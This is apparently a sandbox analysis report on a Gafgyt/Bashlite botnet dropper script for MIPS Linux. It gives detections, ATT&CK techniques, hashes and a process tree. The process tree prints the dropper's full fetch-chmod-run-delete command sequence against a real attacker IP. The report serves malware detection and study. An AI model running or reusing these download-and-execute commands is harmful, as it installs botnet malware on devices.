gafgyt | 72f5f8ec4a91b6d69c3e3be588664aba1c2c511ecdfd8430dc0edf9d1af00353

Analysis

max time kernel
145s
max time network
143s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
11-01-2025 00:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

curl.sh
Size

1KB
MD5

d8d6be287e3428bc6eb16a3e05e8ab47
SHA1

c6bba87f1258183e8e70b2ac18dee260c48eb04d
SHA256

72f5f8ec4a91b6d69c3e3be588664aba1c2c511ecdfd8430dc0edf9d1af00353
SHA512

a8a1f7d030459952f7523cdc2345844d3ce1f6da443a302c17b32fc053fe12a36aed91fa507f0575cce11459434224a54bd21bb814606bc964ec9476a549ceee

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Signatures

Detected Gafgyt variant 14 IoCs

resource	yara_rule
behavioral3/files/fstream-1.dat	family_gafgyt
behavioral3/files/fstream-2.dat	family_gafgyt
behavioral3/files/fstream-3.dat	family_gafgyt
behavioral3/files/fstream-4.dat	family_gafgyt
behavioral3/files/fstream-5.dat	family_gafgyt
behavioral3/files/fstream-6.dat	family_gafgyt
behavioral3/files/fstream-7.dat	family_gafgyt
behavioral3/files/fstream-8.dat	family_gafgyt
behavioral3/files/fstream-9.dat	family_gafgyt
behavioral3/files/fstream-10.dat	family_gafgyt
behavioral3/files/fstream-11.dat	family_gafgyt
behavioral3/files/fstream-12.dat	family_gafgyt
behavioral3/files/fstream-13.dat	family_gafgyt
behavioral3/files/fstream-14.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 14 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
878	chmod
779	chmod
868	chmod
813	chmod
861	chmod
873	chmod
733	chmod
738	chmod
828	chmod
743	chmod
808	chmod
856	chmod
753	chmod
803	chmod

Executes dropped EXE 14 IoCs

ioc	pid	Process
/tmp/ss	734	ss
/tmp/ssb	739	ssb
/tmp/ssc	744	ssc
/tmp/ssd	755	ssd
/tmp/sse	780	sse
/tmp/ssg	804	ssg
/tmp/ssh	809	ssh
/tmp/ssi	814	ssi
/tmp/ssl	830	ssl
/tmp/ssp	857	ssp
/tmp/sss	862	sss
/tmp/sst	869	sst
/tmp/ssx	874	ssx
/tmp/ssy	879	ssy

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/misc/watchdog	sss
File opened for modification	/dev/watchdog	sss

Reads system routing table 1 TTPs 1 IoCs

Gets active network interfaces from /proc virtual filesystem.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	sss

Changes its process name 1 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	sshd	862	sss

Reads system network configuration 1 TTPs 1 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	sss

Reads runtime system information 14 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

Writes file to tmp directory 14 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/sss	curl
File opened for modification	/tmp/ssy	curl
File opened for modification	/tmp/ssb	curl
File opened for modification	/tmp/ssd	curl
File opened for modification	/tmp/ssg	curl
File opened for modification	/tmp/ssi	curl
File opened for modification	/tmp/ssp	curl
File opened for modification	/tmp/ssx	curl
File opened for modification	/tmp/ssc	curl
File opened for modification	/tmp/sse	curl
File opened for modification	/tmp/ssl	curl
File opened for modification	/tmp/ss	curl
File opened for modification	/tmp/ssh	curl
File opened for modification	/tmp/sst	curl

/tmp/curl.sh
/tmp/curl.sh
1⤵
PID:704
- /usr/bin/curl
  curl -o ss http://176.119.150.11/ss
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:708
- /bin/chmod
  chmod +x ss
  2⤵
  - File and Directory Permissions Modification
  PID:733
- /tmp/ss
  ./ss
  2⤵
  - Executes dropped EXE
  PID:734
- /bin/rm
  rm -rf ss
  2⤵
  PID:736
- /usr/bin/curl
  curl -o ssb http://176.119.150.11/ssb
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:737
- /bin/chmod
  chmod +x ssb
  2⤵
  - File and Directory Permissions Modification
  PID:738
- /tmp/ssb
  ./ssb
  2⤵
  - Executes dropped EXE
  PID:739
- /bin/rm
  rm -rf ssb
  2⤵
  PID:741
- /usr/bin/curl
  curl -o ssc http://176.119.150.11/ssc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:742
- /bin/chmod
  chmod +x ssc
  2⤵
  - File and Directory Permissions Modification
  PID:743
- /tmp/ssc
  ./ssc
  2⤵
  - Executes dropped EXE
  PID:744
- /bin/rm
  rm -rf ssc
  2⤵
  PID:746
- /usr/bin/curl
  curl -o ssd http://176.119.150.11/ssd
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:747
- /bin/chmod
  chmod +x ssd
  2⤵
  - File and Directory Permissions Modification
  PID:753
- /tmp/ssd
  ./ssd
  2⤵
  - Executes dropped EXE
  PID:755
- /bin/rm
  rm -rf ssd
  2⤵
  PID:757
- /usr/bin/curl
  curl -o sse http://176.119.150.11/sse
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:758
- /bin/chmod
  chmod +x sse
  2⤵
  - File and Directory Permissions Modification
  PID:779
- /tmp/sse
  ./sse
  2⤵
  - Executes dropped EXE
  PID:780
- /bin/rm
  rm -rf sse
  2⤵
  PID:784
- /usr/bin/curl
  curl -o ssg http://176.119.150.11/ssg
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:785
- /bin/chmod
  chmod +x ssg
  2⤵
  - File and Directory Permissions Modification
  PID:803
- /tmp/ssg
  ./ssg
  2⤵
  - Executes dropped EXE
  PID:804
- /bin/rm
  rm -rf ssg
  2⤵
  PID:806
- /usr/bin/curl
  curl -o ssh http://176.119.150.11/ssh
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:807
- /bin/chmod
  chmod +x ssh
  2⤵
  - File and Directory Permissions Modification
  PID:808
- /tmp/ssh
  ./ssh
  2⤵
  - Executes dropped EXE
  PID:809
- /bin/rm
  rm -rf ssh
  2⤵
  PID:811
- /usr/bin/curl
  curl -o ssi http://176.119.150.11/ssi
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:812
- /bin/chmod
  chmod +x ssi
  2⤵
  - File and Directory Permissions Modification
  PID:813
- /tmp/ssi
  ./ssi
  2⤵
  - Executes dropped EXE
  PID:814
- /bin/rm
  rm -rf ssi
  2⤵
  PID:816
- /usr/bin/curl
  curl -o ssl http://176.119.150.11/ssl
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:817
- /bin/chmod
  chmod +x ssl
  2⤵
  - File and Directory Permissions Modification
  PID:828
- /tmp/ssl
  ./ssl
  2⤵
  - Executes dropped EXE
  PID:830
- /bin/rm
  rm -rf ssl
  2⤵
  PID:833
- /usr/bin/curl
  curl -o ssp http://176.119.150.11/ssp
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:834
- /bin/chmod
  chmod +x ssp
  2⤵
  - File and Directory Permissions Modification
  PID:856
- /tmp/ssp
  ./ssp
  2⤵
  - Executes dropped EXE
  PID:857
- /bin/rm
  rm -rf ssp
  2⤵
  PID:859
- /usr/bin/curl
  curl -o sss http://176.119.150.11/sss
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:860
- /bin/chmod
  chmod +x sss
  2⤵
  - File and Directory Permissions Modification
  PID:861
- /tmp/sss
  ./sss
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Reads system routing table
  - Changes its process name
  - Reads system network configuration
  PID:862
- /bin/rm
  rm -rf sss
  2⤵
  PID:866
- /usr/bin/curl
  curl -o sst http://176.119.150.11/sst
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:867
- /bin/chmod
  chmod +x sst
  2⤵
  - File and Directory Permissions Modification
  PID:868
- /tmp/sst
  ./sst
  2⤵
  - Executes dropped EXE
  PID:869
- /bin/rm
  rm -rf sst
  2⤵
  PID:871
- /usr/bin/curl
  curl -o ssx http://176.119.150.11/ssx
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:872
- /bin/chmod
  chmod +x ssx
  2⤵
  - File and Directory Permissions Modification
  PID:873
- /tmp/ssx
  ./ssx
  2⤵
  - Executes dropped EXE
  PID:874
- /bin/rm
  rm -rf ssx
  2⤵
  PID:876
- /usr/bin/curl
  curl -o ssy http://176.119.150.11/ssy
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:877
- /bin/chmod
  chmod +x ssy
  2⤵
  - File and Directory Permissions Modification
  PID:878
- /tmp/ssy
  ./ssy
  2⤵
  - Executes dropped EXE
  PID:879
- /bin/rm
  rm -rf ssy
  2⤵
  PID:881

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/ss

Filesize
93KB

MD5
571cf759d074ffb3ade51d8d72964416

SHA1
bf3d0db705b8deb7015e80ef0c7419aefa833dd8

SHA256
3173307bd4fb47b9bfff050f22be58fe2396e13f514d41b23f8f1922d5c7dd31

SHA512
bda9127534ba0a674e378538268cf3450d58aff27142685afdac146759479f0d2af4429110b3b41b4c5b22652840820453f775861a0a9f2df572ddbe63c106e6

Download Submit
/tmp/ssb

Filesize
121KB

MD5
8d1eeb9625c13d477f0e32cef54fa48e

SHA1
f2dfd75b6867d1cd80a9ac3c992522af020eb5f9

SHA256
8229fbb71847846c8bcb710f31e40f33cf18902c2f44df43ef7dea59b546848a

SHA512
6bfe15810cab78c69ce6e1432b905b68cfcca3db52042ae8611ecdf59ebe7616bcca9e8126c115f70e7f684966987b1d3df2ee719f8e89d151688d1208d9f2b1

Download Submit
/tmp/ssc

Filesize
114KB

MD5
efe15ba1820417d03d93945493f85d40

SHA1
3eed1523b6e927eb1178599f648876d1e03fc97a

SHA256
e307e9fcdf40303f6263af3d92ec709fd7137ffbceaabd4581ecba1120408a66

SHA512
7d825da8769353521b1d4f8bb9e59c21cedd5dca8ac3493394546ee462ee640aa598cf04b00a92ca6af736c16d2b0b16689508d37378cf7f017246196bb9665d

Download Submit
/tmp/ssd

Filesize
135KB

MD5
c7212063b2e285ec072d0ab348ee208e

SHA1
5f8830f178b92946bedef6f8a58a6a762792a698

SHA256
58042feda2e514f3c0badf4d7c527c8bf044e21169f287b895f7fa66e5a9c7f1

SHA512
b77b00b30c424c7a2892f43373a783064c174cfc6df7ab73a944d512f11cd2c0ff6c808d656a30c3f891f28f2c46920bcd611ee48cceadc9e0a2e63b7ecd8c39

Download Submit
/tmp/sse

Filesize
172KB

MD5
b926ed51ed242929568603920eeafa80

SHA1
544d897f4ae68acdf362913d01aed9ce40a0f8f7

SHA256
78d9bd20f10d57676983187d288e56103e535a16d8074efbcfa75491e541f452

SHA512
da8f3ec6d2f0b156b7129e91c8f06f2e4b3e6c9fef7211e15ae44c23e713915df402ac75282dafc52ee16aa3fb7edfe35bb431c0fdf8a29242d73af903bd9a1e

Download Submit
/tmp/ssg

Filesize
95KB

MD5
f7ed48fc0de0651626d9f87b4727df79

SHA1
ed72b4b70d2709aa1d3ba02c012936c6e429879d

SHA256
07955ebd5a47d8a8d646b8e62cf7e4af1497609a66a4045a5a90251446e1ffc9

SHA512
72647ac0abb4624e96f4d6bdf78b47062323cebb6672ac95d68e47329854c41cbf1f562014365fe36e74f9d227a42718a1a1e48ef35a6561550f54d2bca8c4fb

Download Submit
/tmp/ssh

Filesize
108KB

MD5
d80987391e75192cf4d80073f9d4d30e

SHA1
496a56e87bb2715f711801a90905b3ca0069f11b

SHA256
09f6d3428f6ad98b827b4a2d7cb2e5c62cd9a4e9477d6f6132f5c7e5b61deb00

SHA512
9093017a3c6b5afde25d9f97512bda84ef902efe5c9de6e4717992d10e5a04f7fa7bda2761007accb9b125c628b5534fcbc1d60d79fad04a2fcf50e1958ac6d0

Download Submit
/tmp/ssi

Filesize
93KB

MD5
d1212df64a7d2d766b11b658c4773985

SHA1
0af16b515d81f1b5762f7df6086381889713a323

SHA256
484fa86f32c345672f00534cc1184acb7f3cf0eceef7a92207ba58a3dbf566b4

SHA512
48924fca90e330ce11ae99c77cea5efa9d3752989a2d25afe68d8fa9820f9ee3aa32acb250939bf49b3c460e6cbb27d924d8d4f0912259e709588208f5376029

Download Submit
/tmp/ssl

Filesize
110KB

MD5
df7cdcbff0e8955f819f4135b79bea6b

SHA1
c2bb42d62ae722b770eef444045f98fec2936108

SHA256
519998735de4fb37798bef44420a65c1e32708014adf8f9dcb37e978857049a1

SHA512
62d1cb8291645594db64baaf86fade1b794673a11f42af49ef285c7a682c648790dd04c3c0b4a8c38de1b67fc7b26ec3a1d3b15043d948abaca58fedc7702e89

Download Submit
/tmp/ssp

Filesize
123KB

MD5
c8ab17b0f8a87a57b995e0751c0f5d6c

SHA1
5db69ac9deefb54135ed0479fde2c66ca682e49d

SHA256
00e29fbc2da8092d07e4d251d7250af9d763aa3c742284ab6d06b2a6036c0253

SHA512
513ab7f805e417fc0c31d2499c62a0b27108364651017832e76ae9927f38b3686f6087669db247e12e9a7d77b3ec1bfcbcf4c26f7af0c3643f5ff24a2c40acf0

Download Submit
/tmp/sss

Filesize
152KB

MD5
355df6994cb5f3630648b5754714ea64

SHA1
19b79c2581b4b39232ed7bcc321f4ea5183d95f9

SHA256
a30ef448e98d5aa6b2c06a407a335eeefe546eb933d1d0a8e6ab7ad1a1e4298e

SHA512
65fb1e5a18bfdd894c4bc86f723cbe35f2189937f6033ca1d2e823c0d7413df99f5d16754a6e7bfe333f6b92f7fe8a35d422191637785c5b372daabeb6cb31b4

Download Submit
/tmp/sst

Filesize
152KB

MD5
ca9c6f4322c9c6e0fe6e4490bf87ce42

SHA1
e322d9d7342f3eb7808d018a0c602b453d5c9d5f

SHA256
2936f3c8ef94b48648ec143cfce4d197e8826016213ce0f297bef149be7577bb

SHA512
d896c6350cdf3132541ab2e8f68d18ab12946fb6fe17d1c02b57edd565d0bdb93fbb5ce96f61df9ff1b02fcedcf9b2618a036e84fde04a7af91e57720af12c8f

Download Submit
/tmp/ssx

Filesize
110KB

MD5
0aba08f117d7b1e5faffc1e3bdaf8f31

SHA1
656e5e6724e5915eadf2b8fe3baf7f36d1aedb70

SHA256
c8324d2e1dbe352de9d94f079590b099159c102536a6ba24464379962a06e68c

SHA512
c0b1c9975263ae23ae4ce50b77690a951807c4fa39070947f07a67742ce71652c4e5e3c24970583c6b3c5687e1d2909f2f7814e105751ec745859184d302f56c

Download Submit
/tmp/ssy

Filesize
103KB

MD5
fb6a59851faf43a7bf168e2ead828f93

SHA1
89454352f97fe8ff93d7e51bae7b86aa3e3a810c

SHA256
e3c9fd938639392b6d9b8b4656d5b199c90356d0b61ea35b7a83202269e28df2

SHA512
359bc1277ab172b587eeff94945a5198834cb708a0a7e1a0dbe71a15b137dbbb745be4ce03ed8e813ff3f3b417b8af5bfe75cbd8280305e0430f1a6c7b7eeb52

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads